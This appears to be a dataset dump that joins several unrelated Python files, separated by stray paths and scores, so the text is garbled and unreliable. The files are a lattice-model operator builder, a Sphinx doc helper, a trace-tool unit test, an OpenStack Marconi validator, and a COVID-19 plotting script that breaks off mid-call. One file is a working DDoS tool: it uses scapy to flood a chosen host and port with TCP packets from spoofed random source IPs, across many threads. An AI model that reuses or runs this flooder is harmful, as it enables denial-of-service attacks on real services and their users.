]
)
def create_hopping_term(self) -> MBOperatorSpecification:
matrix = numpy.zeros((self.parameters.sites, self.parameters.sites))
for i in range(self.parameters.sites - 1):
matrix[i, i + 1] = 1.0
matrix[i + 1, i] = 1.0
if self.parameters.pbc:
matrix[0, -1] = 1.0
matrix[-1, 0] = 1.0
return MBOperatorSpecification(
(1,),
(self.grid,),
{
"hopping_coeff": -self.parameters.J,
},
{"hopping": matrix},
"hopping_coeff | 1 hopping",
)
def create_correlator(self, site_a: int, site_b: int) -> MBOperatorSpecification:
matrix = numpy.zeros((self.parameters.sites, self.parameters.sites))
matrix[site_a, site_b] = 1.0
return MBOperatorSpecification(
(1,),
(self.grid,),
{"correlator_coeff": 1.0},
{"correlator": matrix},
"correlator_coeff | 1 correlator",
)
def create_interaction_term(self) -> MBOperatorSpecification:
def create_delta_peak(n: int, i: int) -> numpy.ndarray:
result = numpy.zeros(n)
result[i] = 1.0
return result
n = self.grid.get().npoints
return MBOperatorSpecification(
(1,),
(self.grid,),
{"interaction_coeff": self.parameters.U},
{f"interaction_term_{i}": create_delta_peak(n, i) for i in range(n)},
[
"interaction_coeff | 1 interaction_term_{} | 1* interaction_term_{}".format(
i, i
)
for i in range(n)
],
)
def get_site_occupation_operator(self, site_index: int) -> MBOperatorSpecification:
term = numpy.zeros(self.grid.get().npoints)
term[site_index] = 1
return MBOperatorSpecification(
(1,),
(self.grid,),
{"site_occupation_coeff": 1.0},
{"site_occupation": term},
"site_occupation_coeff | 1 site_occupation",
)
def get_site_occupation_operator_squared(
self, site_index: int
) -> MBOperatorSpecification:
term = numpy.zeros(self.grid.get().npoints)
term[site_index] = 1
return MBOperatorSpecification(
(1,),
(self.grid,),
{"site_occupation_coeff_1": 1.0, "site_occupation_coeff_2": 2.0},
{"site_occupation": term},
[
"site_occupation_coeff_1 | 1 site_occupation",
"site_occupation_coeff_2 | 1 site_occupation | 1* site_occupation",
],
)
def get_site_occupation_pair_operator(
self, site_index_1: int, site_index_2: int
) -> MBOperatorSpecification:
n = self.grid.get().npoints
term_1 = numpy.zeros(n)
term_1[site_index_1] = 1
term_2 = numpy.zeros(n)
term_2[site_index_2] = 1
terms = {"site_occupation_pair_1": term_1, "site_occupation_pair_2": term_2}
coefficients = {"site_occupation_pair_2b_coeff": 2.0}
table = [
"site_occupation_pair_2b_coeff | 1 site_occupation_pair_1 | 1* site_occupation_pair_2"
]
if site_index_1 == site_index_2:
coefficients["site_occupation_pair_1b_coeff"] = 1.0
table.append("site_occupation_pair_1b_coeff | 1 site_occupation_pair_1")
return MBOperatorSpecification((1,), (self.grid,), coefficients, terms, table)
def get_hamiltonian(self) -> MBOperatorSpecification:
terms: List[MBOperatorSpecification] = []
if self.parameters.J != 0.0:
terms.append(self.create_hopping_term())
if self.parameters.U != 0.0:
terms.append(self.create_interaction_term())
if terms is None:
raise RuntimeError("Hamiltonian would be empty since both J and U are 0.0")
operator = terms[0]
for term in terms[1:]:
operator += term
return operator
def get_fake_initial_state_hamiltonian(self) -> OperatorSpecification:
n = self.grid.get().npoints
mat = numpy.zeros((n, n), dtype=numpy.float64)
for i in range(n):
mat[i, i] = i
return OperatorSpecification(
(self.grid,),
{
"coeff": 1,
},
{
"matrix": mat,
},
"coeff | 1 matrix",
)
def distribute_particles(self) -> numpy.ndarray:
ns = numpy.zeros(self.parameters.m)
loc = 0
for _ in range(self.parameters.N):
ns[loc] += 1
loc = (loc + 1) % self.parameters.m
assert numpy.sum(ns) == self.parameters.N
return ns | 0.853776 | 0.55266 |
import importlib
import inspect
import pkgutil
import sys
def package_classes(package):
"""Get a list of classes in a package.
Return a list of qualified names of classes in the specified package. Classes in modules
with names beginning with an "_" are omitted, as are classes whose internal module name
record is not the same as the module in which they are found (i.e. indicating that they
have been imported from elsewhere).
Args:
package: Reference to package for which classes are to be listed (not package name
string)
"""
classes = []
# Iterate over modules in package
for importer, modname, _ in pkgutil.walk_packages(
path=package.__path__, prefix=(package.__name__ + "."), onerror=lambda x: None
):
# Skip modules whose names begin with a "_"
if modname.split(".")[-1][0] == "_":
continue
importlib.import_module(modname)
# Iterate over module members
for name, obj in inspect.getmembers(sys.modules[modname]):
if inspect.isclass(obj):
# Get internal module name of class for comparison with working module name
try:
objmodname = getattr(sys.modules[modname], obj.__name__).__module__
except Exception:
objmodname = None
if objmodname == modname:
classes.append(modname + "." + obj.__name__)
return classes
def insert_inheritance_diagram(clsqname):
"""Insert an inheritance diagram into a class docstring.
No action is taken for classes without a base clase, and for classes without a docstring.
Args:
clsqname: Qualified name (i.e. including module name path) of class
"""
# Extract module name and class name from qualified class name
clspth = clsqname.split(".")
modname = ".".join(clspth[0:-1])
clsname = clspth[-1]
# Get reference to class
cls = getattr(sys.modules[modname], clsname)
# Return immediately if class has no base classes
if getattr(cls, "__bases__") == (object,):
return
# Get current docstring
docstr = getattr(cls, "__doc__")
# Return immediately if class has no docstring
if docstr is None:
return
# Split docstring into individual lines
lines = docstr.splitlines()
# Return immediately if there are no lines
if not lines:
return
# Cut leading whitespace lines
n = 0
for n, line in enumerate(lines):
if line != "":
break
lines = lines[n:]
# Define inheritance diagram insertion text
idstr = (
"""
.. inheritance-diagram:: %s
:parts: 2
"""
% clsname
)
# Insert inheritance diagram after summary line and whitespace line following it
lines.insert(2, idstr)
# Construct new docstring and attach it to the class
extdocstr = "\n".join(lines)
setattr(cls, "__doc__", extdocstr) | docs/source/docutil.py | import importlib
import inspect
import pkgutil
import sys
def package_classes(package):
"""Get a list of classes in a package.
Return a list of qualified names of classes in the specified package. Classes in modules
with names beginning with an "_" are omitted, as are classes whose internal module name
record is not the same as the module in which they are found (i.e. indicating that they
have been imported from elsewhere).
Args:
package: Reference to package for which classes are to be listed (not package name
string)
"""
classes = []
# Iterate over modules in package
for importer, modname, _ in pkgutil.walk_packages(
path=package.__path__, prefix=(package.__name__ + "."), onerror=lambda x: None
):
# Skip modules whose names begin with a "_"
if modname.split(".")[-1][0] == "_":
continue
importlib.import_module(modname)
# Iterate over module members
for name, obj in inspect.getmembers(sys.modules[modname]):
if inspect.isclass(obj):
# Get internal module name of class for comparison with working module name
try:
objmodname = getattr(sys.modules[modname], obj.__name__).__module__
except Exception:
objmodname = None
if objmodname == modname:
classes.append(modname + "." + obj.__name__)
return classes
def insert_inheritance_diagram(clsqname):
"""Insert an inheritance diagram into a class docstring.
No action is taken for classes without a base clase, and for classes without a docstring.
Args:
clsqname: Qualified name (i.e. including module name path) of class
"""
# Extract module name and class name from qualified class name
clspth = clsqname.split(".")
modname = ".".join(clspth[0:-1])
clsname = clspth[-1]
# Get reference to class
cls = getattr(sys.modules[modname], clsname)
# Return immediately if class has no base classes
if getattr(cls, "__bases__") == (object,):
return
# Get current docstring
docstr = getattr(cls, "__doc__")
# Return immediately if class has no docstring
if docstr is None:
return
# Split docstring into individual lines
lines = docstr.splitlines()
# Return immediately if there are no lines
if not lines:
return
# Cut leading whitespace lines
n = 0
for n, line in enumerate(lines):
if line != "":
break
lines = lines[n:]
# Define inheritance diagram insertion text
idstr = (
"""
.. inheritance-diagram:: %s
:parts: 2
"""
% clsname
)
# Insert inheritance diagram after summary line and whitespace line following it
lines.insert(2, idstr)
# Construct new docstring and attach it to the class
extdocstr = "\n".join(lines)
setattr(cls, "__doc__", extdocstr) | 0.521959 | 0.328583 |
import trace
import os
import subprocess
import tempfile
import unittest
import shlex
import libutil
class TraceTest(unittest.TestCase):
def setUp(self):
# create a directory hierarchy to do tests in
self.test_data_dir = os.path.realpath(os.path.join(tempfile.gettempdir(), 'trace_test'))
if os.path.exists(self.test_data_dir):
self.rm_rf(self.test_data_dir)
self.system('mkdir %s' % self.test_data_dir)
def test_start_cold(self):
util = libutil.LibUtil(self.test_data_dir)
trace1 = trace.Trace(util, self.test_data_dir)
self.assertTrue(trace1.did_compile)
self.assertEquals(os.path.join(self.test_data_dir, "trace", "trace"), trace1._executable)
self.assertEquals(os.path.join(self.test_data_dir, "trace.codes"), trace1.codes_file)
def test_start_warm(self):
util = libutil.LibUtil(self.test_data_dir)
trace1 = trace.Trace(util, self.test_data_dir)
self.assertTrue(trace1.did_compile)
trace2 = trace.Trace(util, self.test_data_dir)
self.assertFalse(trace2.did_compile)
def test_call_mocked(self):
real_system = os.system
system_args = []
def mock_system(*args):
del system_args[:]
system_args.extend(args)
return 7
os.system = mock_system
try:
util = libutil.LibUtil(self.test_data_dir)
trace1 = trace.Trace(util, self.test_data_dir)
ret = trace1.call(["test"], sudo=False)
self.assertEquals(7, ret)
self.assertEquals("%s test" % trace1._executable, system_args[-1])
ret = trace1.call(["test"], sudo=True)
self.assertEquals("%s test" % trace1._executable, system_args[-1])
self.assertEquals(7, ret)
finally:
os.system = real_system
def system(self, cmd):
args = shlex.split(cmd)
p = subprocess.Popen(args,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
p.communicate()
return p.returncode
def rm_rf(self, dirname):
self.system('rm -rf -- %s' % dirname)
def tearDown(self):
if self.test_data_dir:
if os.path.exists(self.test_data_dir):
self.rm_rf(self.test_data_dir)
self.test_data_dir = None | src/trace_test.py | import trace
import os
import subprocess
import tempfile
import unittest
import shlex
import libutil
class TraceTest(unittest.TestCase):
def setUp(self):
# create a directory hierarchy to do tests in
self.test_data_dir = os.path.realpath(os.path.join(tempfile.gettempdir(), 'trace_test'))
if os.path.exists(self.test_data_dir):
self.rm_rf(self.test_data_dir)
self.system('mkdir %s' % self.test_data_dir)
def test_start_cold(self):
util = libutil.LibUtil(self.test_data_dir)
trace1 = trace.Trace(util, self.test_data_dir)
self.assertTrue(trace1.did_compile)
self.assertEquals(os.path.join(self.test_data_dir, "trace", "trace"), trace1._executable)
self.assertEquals(os.path.join(self.test_data_dir, "trace.codes"), trace1.codes_file)
def test_start_warm(self):
util = libutil.LibUtil(self.test_data_dir)
trace1 = trace.Trace(util, self.test_data_dir)
self.assertTrue(trace1.did_compile)
trace2 = trace.Trace(util, self.test_data_dir)
self.assertFalse(trace2.did_compile)
def test_call_mocked(self):
real_system = os.system
system_args = []
def mock_system(*args):
del system_args[:]
system_args.extend(args)
return 7
os.system = mock_system
try:
util = libutil.LibUtil(self.test_data_dir)
trace1 = trace.Trace(util, self.test_data_dir)
ret = trace1.call(["test"], sudo=False)
self.assertEquals(7, ret)
self.assertEquals("%s test" % trace1._executable, system_args[-1])
ret = trace1.call(["test"], sudo=True)
self.assertEquals("%s test" % trace1._executable, system_args[-1])
self.assertEquals(7, ret)
finally:
os.system = real_system
def system(self, cmd):
args = shlex.split(cmd)
p = subprocess.Popen(args,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
p.communicate()
return p.returncode
def rm_rf(self, dirname):
self.system('rm -rf -- %s' % dirname)
def tearDown(self):
if self.test_data_dir:
if os.path.exists(self.test_data_dir):
self.rm_rf(self.test_data_dir)
self.test_data_dir = None | 0.22414 | 0.33269 |
import random
from scapy.all import *
import threading
import socket
import sys
from urllib.parse import urlparse
import colors
import time
class DDoS(object):
def __init__(self, url, ip, start_port, end_port, dport, threads,
interval):
if url is not None and ip is not None:
colors.error('Please provide either the URL or the IP address...')
sys.exit(1)
if ip is not None:
self.target_ip = ip
elif url is not None:
self.target_ip = self.getIP(url)
else:
colors.error('Please provide URL or the IP address to attack...')
if start_port is not None:
if start_port > 0 and start_port < 65355:
self.start_port = int(start_port)
else:
self.start_port = random.randint(1, 100)
if end_port is not None:
if end_port > 1 and end_port < 65356:
self.end_port = int(end_port)
else:
self.end_port = random.randint(1000, 65355)
if dport is None:
self.dport = 80
else:
if dport < 65356 and dport > 0:
self.dport = int(dport)
else:
colors.error('Please provide a valid destination port')
sys.exit(1)
if interval is not None:
self.INTER = int(interval)
else:
self.INTER = 0.0001
if threads is not None:
threads = int(threads)
self.threadValidator(threads)
else:
self.threads = 1
self.number_of_packets = 0
def threadValidator(self, threads):
"""
Validates the number of threads
"""
if threads > 100:
choice = input('Are you sure you want to use {} threads...?'
'This can slow down your system.(Y/N)'
.format(threads))
if choice == 'N' or choice == 'n':
threads = int(input('>> Please enter the number of threads'
' you want to use...'))
self.threadValidator(threads)
else:
self.threads = threads
else:
self.threads = threads
@staticmethod
def getIP(url):
"""
Converts URL to IP
"""
url = urlparse(url)
return socket.gethostbyname(url.netloc)
@staticmethod
def generateIP():
"""
Generates random IP address
"""
ip = str(random.randint(1, 254)) + '.'\
+ str(random.randint(0, 255)) + '.'\
+ str(random.randint(0, 255)) + '.'\
+ str(random.randint(0, 255))
return ip
def generatePacket(self, ip, source_port):
"""
Generates scapy packet
"""
IP_PACKET = IP(src=ip, dst=self.target_ip)
TCP_PACKET = TCP(sport=source_port, dport=self.dport)
PKT = IP_PACKET/TCP_PACKET
return PKT
def sendPacket(self, packet):
"""
Sends the generated packets to the destination
"""
send(packet, inter=self.INTER, verbose=False)
self.number_of_packets = self.number_of_packets + 1
print('[+] Packets sent : {}'.format(self.number_of_packets), end='\r')
def attack(self):
while True:
start_index = 0
ip = self.generateIP()
break_point = random.randint(1, 25)
for _ in range(self.start_port, self.end_port):
source_port = random.randint(self.start_port, self.end_port)
newPacket = self.generatePacket(ip, source_port)
self.sendPacket(newPacket)
start_index = start_index + 1
if start_index > break_point:
break
def startAttack(self):
try:
colors.info('DDoS Attack on : {} : {}'
.format(self.target_ip, self.dport))
colors.success('DDoS Attack started, press CTRL+C to stop...')
t1 = time.time()
threads = []
for _ in range(self.threads):
newThread = threading.Thread(target=self.attack)
threads.append(newThread)
newThread.start()
for thread in threads:
thread.join()
except KeyboardInterrupt:
t2 = time.time()
colors.success('Completed in time : {}'.format(t2-t1)) | src/lib/attacks/ddos/ddos.py |
import random
from scapy.all import *
import threading
import socket
import sys
from urllib.parse import urlparse
import colors
import time
class DDoS(object):
def __init__(self, url, ip, start_port, end_port, dport, threads,
interval):
if url is not None and ip is not None:
colors.error('Please provide either the URL or the IP address...')
sys.exit(1)
if ip is not None:
self.target_ip = ip
elif url is not None:
self.target_ip = self.getIP(url)
else:
colors.error('Please provide URL or the IP address to attack...')
if start_port is not None:
if start_port > 0 and start_port < 65355:
self.start_port = int(start_port)
else:
self.start_port = random.randint(1, 100)
if end_port is not None:
if end_port > 1 and end_port < 65356:
self.end_port = int(end_port)
else:
self.end_port = random.randint(1000, 65355)
if dport is None:
self.dport = 80
else:
if dport < 65356 and dport > 0:
self.dport = int(dport)
else:
colors.error('Please provide a valid destination port')
sys.exit(1)
if interval is not None:
self.INTER = int(interval)
else:
self.INTER = 0.0001
if threads is not None:
threads = int(threads)
self.threadValidator(threads)
else:
self.threads = 1
self.number_of_packets = 0
def threadValidator(self, threads):
"""
Validates the number of threads
"""
if threads > 100:
choice = input('Are you sure you want to use {} threads...?'
'This can slow down your system.(Y/N)'
.format(threads))
if choice == 'N' or choice == 'n':
threads = int(input('>> Please enter the number of threads'
' you want to use...'))
self.threadValidator(threads)
else:
self.threads = threads
else:
self.threads = threads
@staticmethod
def getIP(url):
"""
Converts URL to IP
"""
url = urlparse(url)
return socket.gethostbyname(url.netloc)
@staticmethod
def generateIP():
"""
Generates random IP address
"""
ip = str(random.randint(1, 254)) + '.'\
+ str(random.randint(0, 255)) + '.'\
+ str(random.randint(0, 255)) + '.'\
+ str(random.randint(0, 255))
return ip
def generatePacket(self, ip, source_port):
"""
Generates scapy packet
"""
IP_PACKET = IP(src=ip, dst=self.target_ip)
TCP_PACKET = TCP(sport=source_port, dport=self.dport)
PKT = IP_PACKET/TCP_PACKET
return PKT
def sendPacket(self, packet):
"""
Sends the generated packets to the destination
"""
send(packet, inter=self.INTER, verbose=False)
self.number_of_packets = self.number_of_packets + 1
print('[+] Packets sent : {}'.format(self.number_of_packets), end='\r')
def attack(self):
while True:
start_index = 0
ip = self.generateIP()
break_point = random.randint(1, 25)
for _ in range(self.start_port, self.end_port):
source_port = random.randint(self.start_port, self.end_port)
newPacket = self.generatePacket(ip, source_port)
self.sendPacket(newPacket)
start_index = start_index + 1
if start_index > break_point:
break
def startAttack(self):
try:
colors.info('DDoS Attack on : {} : {}'
.format(self.target_ip, self.dport))
colors.success('DDoS Attack started, press CTRL+C to stop...')
t1 = time.time()
threads = []
for _ in range(self.threads):
newThread = threading.Thread(target=self.attack)
threads.append(newThread)
newThread.start()
for thread in threads:
thread.join()
except KeyboardInterrupt:
t2 = time.time()
colors.success('Completed in time : {}'.format(t2-t1)) | 0.322633 | 0.09187 |
import re
from oslo.config import cfg
from marconi.openstack.common.gettextutils import _
MIN_MESSAGE_TTL = 60
MIN_CLAIM_TTL = 60
MIN_CLAIM_GRACE = 60
_TRANSPORT_LIMITS_OPTIONS = (
cfg.IntOpt('max_queues_per_page', default=20,
deprecated_name='queue_paging_uplimit',
deprecated_group='limits:transport'),
cfg.IntOpt('max_messages_per_page', default=20,
deprecated_name='message_paging_uplimit',
deprecated_group='limits:transport'),
cfg.IntOpt('max_messages_per_claim', default=20),
cfg.IntOpt('max_queue_metadata', default=64 * 1024,
deprecated_name='metadata_size_uplimit',
deprecated_group='limits:transport'),
cfg.IntOpt('max_message_size', default=256 * 1024,
deprecated_name='message_size_uplimit',
deprecated_group='limits:transport'),
cfg.IntOpt('max_message_ttl', default=1209600,
deprecated_name='message_ttl_max',
deprecated_group='limits:transport'),
cfg.IntOpt('max_claim_ttl', default=43200,
deprecated_name='claim_ttl_max',
deprecated_group='limits:transport'),
cfg.IntOpt('max_claim_grace', default=43200,
deprecated_name='claim_grace_max',
deprecated_group='limits:transport'),
)
_TRANSPORT_LIMITS_GROUP = 'transport'
# NOTE(kgriffs): Don't use \w because it isn't guaranteed to match
# only ASCII characters.
QUEUE_NAME_REGEX = re.compile('^[a-zA-Z0-9_\-]+$')
QUEUE_NAME_MAX_LEN = 64
PROJECT_ID_MAX_LEN = 256
def _config_options():
return [(_TRANSPORT_LIMITS_GROUP, _TRANSPORT_LIMITS_OPTIONS)]
class ValidationFailed(ValueError):
"""User input did not follow API restrictions."""
def __init__(self, msg, *args, **kwargs):
msg = msg.format(*args, **kwargs)
super(ValidationFailed, self).__init__(msg)
class Validator(object):
def __init__(self, conf):
self._conf = conf
self._conf.register_opts(_TRANSPORT_LIMITS_OPTIONS,
group=_TRANSPORT_LIMITS_GROUP)
self._limits_conf = self._conf[_TRANSPORT_LIMITS_GROUP]
def queue_identification(self, queue, project):
"""Restrictions on a project id & queue name pair.
:param queue: Name of the queue
:param project: Project id
:raises: ValidationFailed if the `name` is longer than 64
characters or contains anything other than ASCII digits and
letters, underscores, and dashes. Also raises if `project`
is not None but longer than 256 characters.
"""
if project is not None and len(project) > PROJECT_ID_MAX_LEN:
msg = _(u'Project ids may not be more than {0} characters long.')
raise ValidationFailed(msg, PROJECT_ID_MAX_LEN)
if len(queue) > QUEUE_NAME_MAX_LEN:
msg = _(u'Queue names may not be more than {0} characters long.')
raise ValidationFailed(msg, QUEUE_NAME_MAX_LEN)
if not QUEUE_NAME_REGEX.match(queue):
raise ValidationFailed(
_(u'Queue names may only contain ASCII letters, digits, '
'underscores, and dashes.'))
def queue_listing(self, limit=None, **kwargs):
"""Restrictions involving a list of queues.
:param limit: The expected number of queues in the list
:param kwargs: Ignored arguments passed to storage API
:raises: ValidationFailed if the limit is exceeded
"""
uplimit = self._limits_conf.max_queues_per_page
if limit is not None and not (0 < limit <= uplimit):
msg = _(u'Limit must be at least 1 and no greater than {0}.')
raise ValidationFailed(msg, self._limits_conf.max_queues_per_page)
def queue_metadata_length(self, content_length):
"""Restrictions on queue's length.
:param content_length: Queue request's length.
:raises: ValidationFailed if the metadata is oversize.
"""
if content_length > self._limits_conf.max_queue_metadata:
msg = _(u'Queue metadata is too large. Max size: {0}')
raise ValidationFailed(msg, self._limits_conf.max_queue_metadata)
def message_posting(self, messages):
"""Restrictions on a list of messages.
:param messages: A list of messages
:raises: ValidationFailed if any message has a out-of-range
TTL.
"""
if not messages:
raise ValidationFailed(_(u'No messages to enqueu.'))
for msg in messages:
self.message_content(msg)
def message_length(self, content_length):
"""Restrictions on message post length.
:param content_length: Queue request's length.
:raises: ValidationFailed if the metadata is oversize.
"""
if content_length > self._limits_conf.max_message_size:
raise ValidationFailed(
_(u'Message collection size is too large. Max size {0}'),
self._limits_conf.max_message_size)
def message_content(self, message):
    """Validate a single message's TTL against the configured bounds."""
    ttl_max = self._limits_conf.max_message_ttl
    ttl = message['ttl']
    if MIN_MESSAGE_TTL <= ttl <= ttl_max:
        return
    raise ValidationFailed(
        _(u'The TTL for a message may not exceed {0} seconds, and '
          'must be at least {1} seconds long.'),
        ttl_max, MIN_MESSAGE_TTL)
def message_listing(self, limit=None, **kwargs):
    """Validate a message-listing request.

    :param limit: The expected number of messages in the list
    :param kwargs: Ignored arguments passed to storage API
    :raises: ValidationFailed if the limit is exceeded
    """
    if limit is None:
        return
    page_max = self._limits_conf.max_messages_per_page
    if limit <= 0 or limit > page_max:
        raise ValidationFailed(
            _(u'Limit must be at least 1 and may not '
              'be greater than {0}.'),
            page_max)
def claim_creation(self, metadata, limit=None):
    """Validate claim-creation parameters.

    :param metadata: The claim metadata
    :param limit: The number of messages to claim
    :raises: ValidationFailed if either TTL or grace is out of range,
        or the expected number of messages exceed the limit.
    """
    # The TTL restriction is shared with claim updates.
    self.claim_updating(metadata)

    claim_max = self._limits_conf.max_messages_per_claim
    if limit is not None and (limit <= 0 or limit > claim_max):
        raise ValidationFailed(
            _(u'Limit must be at least 1 and may not '
              'be greater than {0}.'),
            claim_max)

    grace = metadata['grace']
    grace_max = self._limits_conf.max_claim_grace
    if not (MIN_CLAIM_GRACE <= grace <= grace_max):
        raise ValidationFailed(
            _(u'The grace for a claim may not exceed {0} seconds, and '
              'must be at least {1} seconds long.'),
            grace_max, MIN_CLAIM_GRACE)
def claim_updating(self, metadata):
"""Restrictions on the claim TTL.
:param metadata: The claim metadata
:raises: ValidationFailed if the TTL is out of range
"""
ttl = metadata['ttl']
if not (MIN_CLAIM_TTL <= ttl <= self._limits_conf.max_claim_ttl):
msg = _(u'The TTL for a claim may not exceed {0} seconds, and '
'must be at least {1} seconds long.')
raise ValidationFailed(
msg, self._limits_conf.max_message_ttl, MIN_CLAIM_TTL) | marconi/queues/transport/validation.py |
import re
from oslo.config import cfg
from marconi.openstack.common.gettextutils import _
# Minimum TTL/grace values (seconds) the API will accept.
MIN_MESSAGE_TTL = 60
MIN_CLAIM_TTL = 60
MIN_CLAIM_GRACE = 60
# Deployment-tunable transport limits. The deprecated_name/group entries
# keep configuration files from older releases working.
_TRANSPORT_LIMITS_OPTIONS = (
cfg.IntOpt('max_queues_per_page', default=20,
deprecated_name='queue_paging_uplimit',
deprecated_group='limits:transport'),
cfg.IntOpt('max_messages_per_page', default=20,
deprecated_name='message_paging_uplimit',
deprecated_group='limits:transport'),
cfg.IntOpt('max_messages_per_claim', default=20),
cfg.IntOpt('max_queue_metadata', default=64 * 1024,
deprecated_name='metadata_size_uplimit',
deprecated_group='limits:transport'),
cfg.IntOpt('max_message_size', default=256 * 1024,
deprecated_name='message_size_uplimit',
deprecated_group='limits:transport'),
cfg.IntOpt('max_message_ttl', default=1209600,
deprecated_name='message_ttl_max',
deprecated_group='limits:transport'),
cfg.IntOpt('max_claim_ttl', default=43200,
deprecated_name='claim_ttl_max',
deprecated_group='limits:transport'),
cfg.IntOpt('max_claim_grace', default=43200,
deprecated_name='claim_grace_max',
deprecated_group='limits:transport'),
)
_TRANSPORT_LIMITS_GROUP = 'transport'
# NOTE(kgriffs): Don't use \w because it isn't guaranteed to match
# only ASCII characters.
QUEUE_NAME_REGEX = re.compile('^[a-zA-Z0-9_\-]+$')
QUEUE_NAME_MAX_LEN = 64
PROJECT_ID_MAX_LEN = 256
def _config_options():
return [(_TRANSPORT_LIMITS_GROUP, _TRANSPORT_LIMITS_OPTIONS)]
class ValidationFailed(ValueError):
    """User input did not follow API restrictions."""

    def __init__(self, msg, *args, **kwargs):
        # Interpolate the positional/keyword args into the message
        # template before handing it to ValueError.
        super(ValidationFailed, self).__init__(msg.format(*args, **kwargs))
class Validator(object):
def __init__(self, conf):
self._conf = conf
self._conf.register_opts(_TRANSPORT_LIMITS_OPTIONS,
group=_TRANSPORT_LIMITS_GROUP)
self._limits_conf = self._conf[_TRANSPORT_LIMITS_GROUP]
def queue_identification(self, queue, project):
"""Restrictions on a project id & queue name pair.
:param queue: Name of the queue
:param project: Project id
:raises: ValidationFailed if the `name` is longer than 64
characters or contains anything other than ASCII digits and
letters, underscores, and dashes. Also raises if `project`
is not None but longer than 256 characters.
"""
if project is not None and len(project) > PROJECT_ID_MAX_LEN:
msg = _(u'Project ids may not be more than {0} characters long.')
raise ValidationFailed(msg, PROJECT_ID_MAX_LEN)
if len(queue) > QUEUE_NAME_MAX_LEN:
msg = _(u'Queue names may not be more than {0} characters long.')
raise ValidationFailed(msg, QUEUE_NAME_MAX_LEN)
if not QUEUE_NAME_REGEX.match(queue):
raise ValidationFailed(
_(u'Queue names may only contain ASCII letters, digits, '
'underscores, and dashes.'))
def queue_listing(self, limit=None, **kwargs):
"""Restrictions involving a list of queues.
:param limit: The expected number of queues in the list
:param kwargs: Ignored arguments passed to storage API
:raises: ValidationFailed if the limit is exceeded
"""
uplimit = self._limits_conf.max_queues_per_page
if limit is not None and not (0 < limit <= uplimit):
msg = _(u'Limit must be at least 1 and no greater than {0}.')
raise ValidationFailed(msg, self._limits_conf.max_queues_per_page)
def queue_metadata_length(self, content_length):
"""Restrictions on queue's length.
:param content_length: Queue request's length.
:raises: ValidationFailed if the metadata is oversize.
"""
if content_length > self._limits_conf.max_queue_metadata:
msg = _(u'Queue metadata is too large. Max size: {0}')
raise ValidationFailed(msg, self._limits_conf.max_queue_metadata)
def message_posting(self, messages):
"""Restrictions on a list of messages.
:param messages: A list of messages
:raises: ValidationFailed if any message has a out-of-range
TTL.
"""
if not messages:
raise ValidationFailed(_(u'No messages to enqueu.'))
for msg in messages:
self.message_content(msg)
def message_length(self, content_length):
"""Restrictions on message post length.
:param content_length: Queue request's length.
:raises: ValidationFailed if the metadata is oversize.
"""
if content_length > self._limits_conf.max_message_size:
raise ValidationFailed(
_(u'Message collection size is too large. Max size {0}'),
self._limits_conf.max_message_size)
def message_content(self, message):
"""Restrictions on each message."""
ttl = message['ttl']
if not (MIN_MESSAGE_TTL <= ttl <= self._limits_conf.max_message_ttl):
msg = _(u'The TTL for a message may not exceed {0} seconds, and '
'must be at least {1} seconds long.')
raise ValidationFailed(
msg, self._limits_conf.max_message_ttl, MIN_MESSAGE_TTL)
def message_listing(self, limit=None, **kwargs):
"""Restrictions involving a list of messages.
:param limit: The expected number of messages in the list
:param kwargs: Ignored arguments passed to storage API
:raises: ValidationFailed if the limit is exceeded
"""
uplimit = self._limits_conf.max_messages_per_page
if limit is not None and not (0 < limit <= uplimit):
msg = _(u'Limit must be at least 1 and may not '
'be greater than {0}.')
raise ValidationFailed(
msg, self._limits_conf.max_messages_per_page)
def claim_creation(self, metadata, limit=None):
"""Restrictions on the claim parameters upon creation.
:param metadata: The claim metadata
:param limit: The number of messages to claim
:raises: ValidationFailed if either TTL or grace is out of range,
or the expected number of messages exceed the limit.
"""
self.claim_updating(metadata)
uplimit = self._limits_conf.max_messages_per_claim
if limit is not None and not (0 < limit <= uplimit):
msg = _(u'Limit must be at least 1 and may not '
'be greater than {0}.')
raise ValidationFailed(
msg, self._limits_conf.max_messages_per_claim)
grace = metadata['grace']
if not (MIN_CLAIM_GRACE <= grace <= self._limits_conf.max_claim_grace):
msg = _(u'The grace for a claim may not exceed {0} seconds, and '
'must be at least {1} seconds long.')
raise ValidationFailed(
msg, self._limits_conf.max_claim_grace, MIN_CLAIM_GRACE)
def claim_updating(self, metadata):
"""Restrictions on the claim TTL.
:param metadata: The claim metadata
:raises: ValidationFailed if the TTL is out of range
"""
ttl = metadata['ttl']
if not (MIN_CLAIM_TTL <= ttl <= self._limits_conf.max_claim_ttl):
msg = _(u'The TTL for a claim may not exceed {0} seconds, and '
'must be at least {1} seconds long.')
raise ValidationFailed(
msg, self._limits_conf.max_message_ttl, MIN_CLAIM_TTL) | 0.677794 | 0.096408 |
import plotly.graph_objects as go # plots
import pandas
import os
import locale
locale.setlocale(locale.LC_ALL, 'de_DE')
os.system("python plot_barchart.py")
confirmed_df = pandas.read_csv("data/time_series/time_series_covid-19_nrw_confirmed.csv")
recovered_df = pandas.read_csv("data/time_series/time_series_covid-19_nrw_recovered.csv")
deaths_df = pandas.read_csv("data/time_series/time_series_covid-19_nrw_deaths.csv")
confirmed_df = confirmed_df.set_index(['Kommune'], drop=True)
recovered_df = recovered_df.set_index(['Kommune'], drop=True)
deaths_df = deaths_df.set_index(['Kommune'], drop=True)
for kommune in confirmed_df.index.unique():
# create plot
fig = go.Figure()
kommune_short = str.split(kommune)[1].lower()
confirmed_ts = confirmed_df.loc[kommune, :].T
recovered_ts = recovered_df.loc[kommune, :].T
deaths_ts = deaths_df.loc[kommune, :].T
confirmed_ts.index = pandas.to_datetime(confirmed_ts.index)
recovered_ts.index = pandas.to_datetime(recovered_ts.index)
deaths_ts.index = pandas.to_datetime(deaths_ts.index)
fig.add_trace(
go.Scatter(
x=confirmed_ts.index,
y=confirmed_ts,
name="Infektionen " + kommune,
connectgaps=True,
mode="lines+markers",
legendgroup=kommune,
line=dict(color="orange", width=4),
marker=dict(size=10),
hovertemplate="Infektionen " + kommune + ", %{x}: %{y}"
+ "<extra></extra>" # no additional legend text in tooltip
)
)
fig.add_trace(
go.Scatter(
x=recovered_ts.index,
y=recovered_ts,
name="Genesene " + kommune,
connectgaps=True,
mode="lines+markers",
legendgroup=kommune,
line=dict(color="green", width=4),
marker=dict(size=10),
hovertemplate="genesen " + kommune + ", %{x}: %{y}"
+ "<extra></extra>" # no additional legend text in tooltip
)
)
fig.add_trace(
